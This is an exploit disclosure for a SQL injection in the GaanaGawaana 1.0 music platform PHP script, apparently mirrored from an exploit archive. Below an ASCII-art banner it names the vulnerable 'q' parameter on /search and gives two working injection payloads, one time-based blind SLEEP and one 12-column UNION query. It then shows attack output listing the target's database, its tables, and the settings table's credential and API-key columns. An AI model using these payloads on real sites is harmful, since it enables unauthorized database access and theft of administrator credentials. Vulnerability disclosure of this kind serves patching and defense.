Exploit for GaanaGawaana 1.0 SQL Injection

Name: Exploit for GaanaGawaana 1.0 SQL Injection
Rating: 5 (90 reviews)
2023-05-11 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:172286
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : codesler.com │  
│ Vendor : Codesler - Rohit Chouhan (codester.com) │  
│ Software : GaanaGawaana 1.0 - Music Platform PHP Script │  
│ Vuln Type: SQL Injection │  
│ Impact : Database Access │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and │  
│ damage to a company's reputation. │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Path: /search  
  
https://website/search?q=[SQLI]  
  
GET parameter 'q' is vulnerable to SQL Injection  
  
---  
Parameter: q (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: q=' AND (SELECT 3838 FROM (SELECT(SLEEP(5)))giXs) AND 'YaMa'='YaMa  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 12 columns  
Payload: q=' UNION ALL SELECT NULL,CONCAT(0x716b707671,0x436e596a66675a65667a6c6a574e675142484f46776b4265766847466958456f6f556c4d58465172,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -  
---  
  
  
[+] Starting the Attack  
  
fetching current database  
  
current database: '***01*6_gaanagawaana'  
  
  
fetching tables  
  
+----------+  
| settings |  
| songs |  
+----------+  
  
  
fetching columns for table 'settings'  
  
+-----------+--------------+  
| Column | Type |  
+-----------+--------------+  
| api_key | varchar(200) |  
| email | varchar(50) |  
| id | int(11) |  
| password | varchar(200) |  
| site_name | longtext |  
| thumbnail | longtext |  
| username | varchar(200) |  
+-----------+--------------+  
  
[-] Done